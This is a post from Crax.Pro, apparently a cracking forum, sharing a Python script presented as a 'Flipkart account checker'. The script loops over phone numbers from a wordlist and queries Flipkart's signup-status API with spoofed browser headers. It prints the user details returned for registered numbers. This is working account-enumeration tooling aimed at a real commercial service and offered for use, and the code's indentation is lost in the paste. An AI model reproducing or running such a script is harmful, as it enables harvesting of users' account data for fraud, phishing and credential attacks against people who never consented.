Source Code - Flipkart account checker. | Web Scripts | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Source Code Flipkart account checker.

Source Code Flipkart account checker.

LV
1
 

alex059

Member
Joined
Jul 30, 2023
Threads
14
Likes
1
Awards
4
Credits
2,991©
Cash
0$
import requests, json

url = 'https://www.flipkart.com/api/6/user/signup/status'
headers = {"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}

with open("wordlist.txt") as numbers:
for number in numbers:
number = number.strip() # Remove leading/trailing whitespace characters (including newline)
data = "{\"loginId\":[\"+" + number + "\"],\"supportAllStates\":true}"
response = requests.post(url, data=data, headers=headers)

if response.status_code == 200:
api_data = response.json()
if api_data and 'RESPONSE' in api_data and 'userDetails' in api_data['RESPONSE']:
status = api_data['RESPONSE']['userDetails']
print(status)
else:
print(f"Error: Invalid API response for {number}.")
else:
print(f"Error: Failed to retrieve PayLater status for {number}.")
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Similar threads

Top Bottom